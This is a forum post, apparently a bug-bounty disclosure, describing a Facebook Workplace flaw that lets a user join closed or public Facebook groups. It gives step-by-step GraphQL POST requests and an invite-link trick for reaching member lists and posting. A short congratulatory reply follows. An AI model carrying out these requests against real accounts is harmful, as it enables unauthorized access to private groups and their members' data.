Become Member Of Close & Public Group

M3m0ry · 1 Haz 2020

Become member of close & public group

this bug allow attacker to add him self as member to closed &public group using workplace platform

1 Go to workplace platform :

https://work.facebook.com/work/admin/user_sets/

2- Create people set :

POST /api/graphql/ HTTP/1.1

Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947

3- Add your work id to the set created:

POST /api/graphql/ HTTP/1.1

Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349

4- Add your work profile to normal group (group not in www.facebook.com)

POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339

* normal_group * :Is normal closed or public group in www.facebook.com (not in workplace)

-

At this point work user can get notifications about new post and other notifications

but when visit here; https://work-id.facebook.com/groups/[normal_group] they redirect to

https://www.facebook.com/groups/[normal_group] to personal profile (not member in group)

The solution : Try to add personnel user to group from work platform

Visit this link:

https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]

You see Invite via link:

https://fb.me/g/AAAAAAAAAA

Visit link and you can join group as personnel user ( see all members ,create post )

Source(Original): Click Me

Source2: Click Me

Alcyoneus · 1 Haz 2020

Good job, dude! Nice article

Become Member Of Close & Public Group

M3m0ry

Kıdemli Üye

Alcyoneus

Üye

Sosyal medya sayfalarımız